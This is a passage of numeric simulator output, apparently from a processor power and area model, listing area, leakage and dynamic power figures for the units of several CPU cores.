'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 1.94177,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000460515,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000460515,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000398547,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000152883,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000726193,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00204577,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00450687,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0485976,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.09123,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.13364,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.165059,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.46206,
'Instruction Fetch Unit/Runtime Dynamic': 0.35385,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.105913,
'L2/Runtime Dynamic': 0.029468,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.17194,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.980098,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.062596,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0625961,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.46873,
'Load Store Unit/Runtime Dynamic': 1.3514,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.154351,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.308703,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0547797,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0563481,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.192201,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0219751,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.445403,
'Memory Management Unit/Runtime Dynamic': 0.0783231,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 19.7794,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.221364,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0123057,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0948945,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.328564,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 4.08337,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0264891,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.223494,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.136566,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0663464,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.107014,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0540172,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.227378,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.054944,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.17456,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0258003,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00278287,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0303044,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.020581,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0561047,
'Execution Unit/Register Files/Runtime Dynamic': 0.0233639,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0704667,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.187539,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.06715,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000190311,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000190311,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000166083,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 6.44697e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000295648,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000842353,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00181317,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0197851,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.2585,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0536059,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0671989,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.53809,
'Instruction Fetch Unit/Runtime Dynamic': 0.143245,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0437782,
'L2/Runtime Dynamic': 0.0122258,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.03053,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.401989,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0256686,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0256687,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.15174,
'Load Store Unit/Runtime Dynamic': 0.554247,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0632944,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.126589,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0224634,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0231115,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.078249,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00881622,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.272946,
'Memory Management Unit/Runtime Dynamic': 0.0319277,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 13.7706,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0678693,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00381932,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0328129,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.104502,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.9133,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.026525,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.223522,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.134947,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0653442,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.105398,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0532012,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.223943,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0540457,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.17099,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0254944,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00274083,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0300875,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0202701,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0555819,
'Execution Unit/Register Files/Runtime Dynamic': 0.0230109,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0700187,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.184639,
